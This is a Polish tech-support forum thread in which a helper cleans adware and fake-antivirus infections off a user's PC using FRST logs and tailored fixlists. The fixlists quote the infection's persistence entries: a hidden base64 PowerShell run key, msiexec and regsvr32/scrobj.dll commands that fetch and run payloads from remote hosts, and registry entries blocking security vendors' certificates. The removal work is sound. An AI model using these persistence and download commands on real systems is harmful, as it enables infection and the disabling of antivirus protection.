Skocz do zawartości

Initialsite123, błąd systemu plików (65535)


Rekomendowane odpowiedzi

Witam wszystkich,
jestem tu nowy, ale się przyglądam od dłuższego czasu i... szacunek!
Krotko - mój problem - złakomiłem się na program do czyszczenia głowic w drukarkach (systemowo), z którego wcześniej korzystałem. Jednak tym razem źródło było inne i stało się źle - PC Healer, PC coś tam plus, strony porno itd. Część udało mi się usunąć, jednak pozostały problemy jak w tytule:
- nie mogę odinstalować initialsite123, próbowałem przez dodaj/usuń (po uruchomieniu nic się nie dzieje), próbowałem programu microsoftu dostępnego u Was (nie znam klucza programu),
- przy próbie instalacji oprogramowania zalecanego przez Was (adwcleaner) pojawia się błąd systemu plików,
- przy próbie uruchomienia eset online pojawia się z kolei info: Temu wydawcy zablokowano możliwość uruchamiania oprogramowania na tym komputerze. I tu ciekawostka - w okienku jest odsyłacz do pomocy :Jak mam odblokować tego wydawcę?, po kliknieciu otwiera pomoc z informacją: Nie znaleziono tego tematu.
Wklejam logi, z góry dzięki za pomoc.


 

Brakuje jeszcze jednego raportu z FRST - zasady działu - uzupełnij proszę.

 

przegapiłem ;) Nowy jestem!

 

EDIT 1: Pojawiła się nowość - komputer firmowy, nie śmiejcie się, więc włączyłem po łikendzie, porzednie problemy zauważyłem w piątek - firefox się zamyka i uruchamia w 2 oknach - Big Bang Emire i Big Farm. Może pogram?

 

Aha, i pytanie z innej beczki, choć dotyczy raportu z FRST Addition.txt - na dole jest sekcja

 

==================== Statystyki pamięci ===========================

 

Procesor: Intel® Xeon® CPU E5410 @ 2.33GHz
Procent pamięci w użyciu: 76%
Całkowita pamięć fizyczna: 4093.65 MB
Dostępna pamięć fizyczna: 970.63 MB
Całkowita pamięć wirtualna: 8185.5 MB
Dostępna pamięć wirtualna: 4417.74 MB

 

Moje pytanie - na płycie jest 8 kości po 1GB, Win widzi 8 GB fizycznej pamieci (w menadżerze), dostępne są jednak tylko 4GB, pozostałe 4 są wyszarzone, korzystam więc tylko z 4GB - ktoś się spotkał z czymś takim? Skąd w raporcie takie dziwne dane?
Pewnie jedno z drugim ma coś wspólnego.
To nie jest związane z głównym wątkiem, zauważyłem po złożeniu komputera, czyli dość dawno.

Addition.txt

FRST.txt

gmer.txt

Shortcut.txt

Edytowane przez Rucek
Łączę. Czekamy na Miszela.
Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

==================== Statystyki pamięci ===========================

 

Procesor: Intel® Xeon® CPU E5410 @ 2.33GHz

Procent pamięci w użyciu: 76%

Całkowita pamięć fizyczna: 4093.65 MB

Dostępna pamięć fizyczna: 970.63 MB

Całkowita pamięć wirtualna: 8185.5 MB

Dostępna pamięć wirtualna: 4417.74 MB

 

Moje pytanie - na płycie jest 8 kości po 1GB, Win widzi 8 GB fizycznej pamieci (w menadżerze), dostępne są jednak tylko 4GB, pozostałe 4 są wyszarzone, korzystam więc tylko z 4GB - ktoś się spotkał z czymś takim? Skąd w raporcie takie dziwne dane?

Pewnie jedno z drugim ma coś wspólnego.

To nie jest związane z głównym wątkiem, zauważyłem po złożeniu komputera, czyli dość dawno.

 

To zostawiam na koniec. 

 

EDIT 1: Pojawiła się nowość - komputer firmowy, nie śmiejcie się, więc włączyłem po łikendzie, porzednie problemy zauważyłem w piątek - firefox się zamyka i uruchamia w 2 oknach - Big Bang Emire i Big Farm. Może pogram?

 

Jeśli masz zgodę przełożonych to i ten komputer będę mógł wyczyść, ale później. 

 


 

Nie powiem, że taki stan systemu to ja widzę niecodziennie, bo widzę nawet i kilka razy dziennie co prezentuje obraz sytuacji. Masa infekcji, prefabrykowane przeglądarki, adware podmieniająca publishera i wiele wiele więcej.

 

Proszę na systemie, na którym zostały wygenerowane raporty wykonać poniższe działania oraz pod żadnym pozorem nie wykonywać operacji związanymi z pieniędzmi. Logowanie w bankach, serwisach typu allegro do czasu zakończenia dezynfekcji stanowczo zabronione. Poniższy klucz, element trzeci korzysta z PowerShella - to nie jest normalna, zwłaszcza w takiej sytuacji i w takim miejscu. 

 

HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [{30190F18-418E-46D2-9ECB-B950915738AB}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\VGThFBfU').mvZBIpGaSCOHv)));

 

Powiem wprost: podejrzewam infekcję VBKlip / Banatrix / DNSUnlocker i to nie błaha sprawa. 

Martwi mnie brak jakiegokolwiek zewnętrznego oprogramowania zabezpieczającego, same zabezpieczenia systemu Windows 7 nie są wystarczające. Przejrzyj - KLIK (ew. instalacje zostaw na koniec).

 

 

1. Spróbuj przeprowadzić deinstalacje oprogramowania adware / PUP poprzez dedykowany plik deinstalacyjny (nazwa powinna być zbliżona do uninstall.exe). Przejdź do poniższych folderów i rozpocznij w każdym z nich po kolei (jeśli jest możliwość) proces usuwania.

  • C:\Program Files (x86)\BestZiper
  • C:\Users\And\AppData\Roaming\Event Monitor
2. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
Task: {5C315247-7CF8-4294-B160-6CD790E6648C} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-09] () 
Task: {6DE9C13A-8EE5-46B0-B795-AD460E7657A9} - System32\Tasks\RunAtStartup => C:\Users\And\AppData\Roaming\Event Monitor\em.exe  
Task: {83CD2AE7-350B-4D3D-B940-E7CD2C37AED2} - System32\Tasks\Reozosh => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=3219913727_67194_F412129D&d=20170509 /q 
Task: {6DB767A5-2000-4EDA-B4FE-EE07B4BAC81D} - System32\Tasks\Lerfopervather Host => C:\Program Files (x86)\Drabocultthhery\nahit.exe [2017-05-09] (Google Inc.)
RemoveDirectory: C:\Program Files (x86)\MIO
RemoveDirectory:  C:\Program Files (x86)\Drabocultthhery
MSCONFIG\startupreg: BestZiper => "C:\Program Files (x86)\BestZiper\BestZiper.exe"
MSCONFIG\startupreg: N0FGC0HF1V04D31 => "C:\Program Files (x86)\BestZiper\5L5DB.exe"
MSCONFIG\startupreg: ukoivek2U'.exe => C:\Program Files\DeviceClient\B58EKQXZ\ukoivek2U'.exe -r1_5 -r2_1
RemoveDirectory: C:\Program Files (x86)\BestZiper
HKLM-x32\...\Run: [] => [X]
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [{30190F18-418E-46D2-9ECB-B950915738AB}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\VGThFBfU').mvZBIpGaSCOHv)));
HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [background_fault] => C:\Users\And\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) 
HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\RunOnce: [uninstall.exe] => C:\Users\And\AppData\Local\Temp\{40f055116c864fe295f7b9c35425692f}\28virLgK3B\uninstall.exe [759808 2017-05-10] () 
 C:\Users\And\AppData\Local\background_fault
C:\Users\And\AppData\Local\Temp\{40f055116c864fe295f7b9c35425692f}\28virLgK3B
HKLM\...\Providers\qm1gaf6p: C:\Program Files (x86)\Lerfopervather Host\local64spl.dll [312832 2017-05-09] ()
ShellExecuteHooks: Brak nazwy - {6DE8549C-316B-11E7-A1E9-64006A5CFC23} - C:\Users\And\AppData\Roaming\Ckanovofesp\Qpution.dll [147968 2017-05-09] ()
RemoveDirectory:  C:\Program Files (x86)\Lerfopervather Host
RemoveDirectory:  C:\Users\And\AppData\Roaming\Ckanovofesp
CHR HomePage: Default -> hxxp://www.istartsurf.com/?type=hp&ts=1447668479&z=f316c3522e14f508af318b4g6z2zdmeqcq2bbg7b4e&from=cor&uid=SAMSUNGXHM321HI_S265J90Z835696835696
CHR StartupUrls: Default -> "hxxps://www.google.com/analytics/web/?hl=pl&pli=1#report/defaultid/a36587162w64719130p66464611/","hxxps://adwords.google.com/cm/CampaignMgmt?authuser=0&__u=1748779171&__c=8682546511#r.ONLINE.cm&app=cm","hxxps://merchants.google.com/Home?a=10826943#insights","hxxps://mysalesbee.com/#app/dashboard","hxxp://druktak.pl/administracja/login_admin.php?osCAdminID=pn0s2alrf79plgtqaqmprnmu91"
R2 BIT; C:\ProgramData\BIT\BIT.dll [1858048 2017-05-09] (BIT.dll) [brak podpisu cyfrowego]
R2 VNASRE; C:\Users\And\AppData\Local\VNASRE\Snare.dll [826368 2017-05-09] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego]
S2 WinSAPSvc; C:\Users\And\AppData\Roaming\WinSAPSvc\WinSAP.dll [X] 
S2 Recover; C:\Program Files\HJ32FO8OE1\CDXYBXJQWQGUU5\fDorppRER_.exe [X]
C:\ProgramData\BIT
C:\Users\And\AppData\Local\VNASRE
C:\Users\And\AppData\Roaming\WinSAPSvc
S2 DgiVecp; \??\C:\Windows\system32\Drivers\DgiVecp.sys [X]
S3 netr7364; system32\DRIVERS\netr7364.sys [X]
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark 1200 Series\Lexmark Solution Center.LNK
C:\Users\And\Links\151119.lnk
C:\Users\And\Links\160602.lnk
C:\Users\And\Desktop\fakt NOWY KW.lnk
ShortcutWithArgument: C:\Users\And\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064
ShortcutWithArgument: C:\Users\And\Desktop\big_bang_empire.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk
C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
RemoveDirectory: C:\Program Files (x86)\Eggper
RemoveDirectory: C:\Program Files (x86)\Firefox
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

4. Wyczyść i zabezpiecz przeglądarkę Google Chrome:

  • Zresetuj synchronizację (o ile włączona): KLIK.
  • Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
  • Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
  • Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.
  • Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin.
  • Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikację infekcji. 
5. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox:
  • Odłącz synchronizację (o ile włączona): KLIK.
  • Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone.
  • Menu Historia > Wyczyść historię przeglądania.
  • Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin.
6. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum.

 

7. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

 

eggper;firefox

 

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 

 

8. Zrób nowy log FRST z opcji Skanuj (Scan), wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Odnośnik do komentarza

Czołem!
Wszystkie objawy, które opisywałem dotyczą tego samego PC.
A teraz po kolei co się udało:
- Best zipper - musiałem usunąć wcześniej, został katalog z plikami - usunąłem,
- Event Monitor - nie ma niestety nawet pół execa ani nic podobnego, lista plików:
2016-04-18 16:38 634 eng_em.ini
2016-04-18 16:38 662 French_em.ini
2016-05-10 18:04 718 German_em.ini
2017-05-10 11:55 264 ininotfound0.ini
2017-01-05 18:45 157˙632 isxdl.dll
2016-05-25 18:30 562 japan_em.ini
2017-05-09 12:16 82 log_05-09-2017.log
2017-05-10 11:53 82 log_05-10-2017.log
2017-05-10 11:54 328 update.ini

 

- FRST z opcją napraw wygenerował plik,
- po zapuszczeniu FRST z opcją napraw Chrome i Firefox zniknęły z systemu - zainstalowałem ff,
- synchronizacji w ff nie było, odświeżyłem, zainstalowałem ublocka,
- chroma na razie nie instaluję, choć go potrzebuję bardzo - korzystam z anliticsów, adwordsów i takich tam,
- AdwCleaner - niestety dalej błąd systemu plików (65535),
- puściłem FRST z opcją szukaj,
- puściłem FRST z opcją skanuj.

 

Wszystkie raporty w załącznikach.

EDIT: Podbijam temat po cichu ciągle licząc na pomoc. Jeśli wykraczam poza regulamin forum, proszę o łagodną karę.

Addition.txt

Shortcut.txt

SearchReg.txt

Fixlog.txt

Edytowane przez Rucek
Odnośnik do komentarza

Kolejna nowość - problem z przeglądarkami. Pisałem wyżej, że po puszczeniu FRST z opcją napraw znikneły wyszukiwarki ff i chrome, że zainstalowłem ff, a chrome nie. Linki do chroma nie działały itd. Otóż wczoraj się pojawił !!! i działa. Oczywiście nie normalnie. Obie przeglądarki są zainfekowane!? Każde wyszukanie włącza inną przeglądarkę, np: http://mystart2.dealwifi.com, którą mogę usunąc przez opcje przeglądarki (ustawia się jako główna) lub nie.

Odnośnik do komentarza
  • 4 tygodnie później...

Wcześniej trochę miałem niedyspozycyjność czasową, ale teraz wrzucam ten temat na priorytet, więc szybko się ze wszystkim uporamy,
 



 
Kolosalny bałagan (jest gorzej niż było wcześniej). Infekcyjne usługi, modyfikacje skrótów LNK i wiele, wiele więcej. Przeglądarki w opłakanym stanie i pomimo wywalenia profili od fałszywek i tak zostaną inne, więc uważam, że wymiana profili będzie słuszna. Oprócz tego infekcja wprowadziła blokady certyfikatów producentów oprogramowania zabezpieczającego.
 
Zapoznaj się: KLIK.  
 
Informacji o braków pewnych wymaganych spraw w systemie nie będę ponownie podawał, bo znajdziesz je w moim pierwszym poście w tym temacie.
 
1. Deinstalacje.

  • Przez panel sterowania odinstaluj programy adware / fałszywe antywirusy: initialsite123 - Uninstall, YAC(Yet Another Cleaner!).
  • Za pomocą narzędzia Program Install and Uninstall Troubleshooter odinstaluj wszystkie cztery pozycje: AlphaGo.

2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:
 

CloseProcesses:
CreateRestorePoint:
Task: {7FFF2EF2-C146-4D1C-A628-4D785460AA93} - System32\Tasks\Exif Bestel for Windows 8 => Rundll32.exe "C:\Program Files\Exif Bestel for Windows 8\Exif Bestel for Windows 8.dll",ypTQVww Task: {76C36436-3B21-4573-B63E-D6F250AB84E1} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () C:\Program Files (x86)\MIO
ShortcutWithArgument: C:\Users\And\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064
ShortcutWithArgument: C:\Users\And\Desktop\big_bang_empire.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005
ShortcutWithArgument: C:\Users\And\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D
ShortcutWithArgument: C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064
ShortcutWithArgument: C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005
C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk
C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
C:\Program Files (x86)\Hotleaf
C:\Users\And\AppData\Roaming\Hotleaf
C:\Users\And\AppData\Local\Hotleaf
C:\Program Files (x86)\Firefox
C:\Users\And\AppData\Roaming\Firefox
C:\Users\And\AppData\Local\Firefox
HKLM\...\RunOnce: [AND-KOMPUTER] => C:\Windows\Temp\gBAC6.tmp.exe [239104 2017-06-19] () HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.bjdnxbgp3.ru/setup.xml scrobj.dll
HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [background_fault] => C:\Users\And\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-06] (AVAST Software) HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj84N8EcOTYyRWhWMYNYMjU1NTlWFjq4M8E1NjHxMdhQRH== /q C:\Users\And\AppData\Local\background_fault
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}
HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495440636&z=1816b38e206bb99366246a4g3z0tew3z9zee7q8c6m&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}
HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D
HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D
HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495440636&z=1816b38e206bb99366246a4g3z0tew3z9zee7q8c6m&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1391594616-1957220202-1850595550-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495440636&z=1816b38e206bb99366246a4g3z0tew3z9zee7q8c6m&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1391594616-1957220202-1850595550-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495440636&z=1816b38e206bb99366246a4g3z0tew3z9zee7q8c6m&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms}
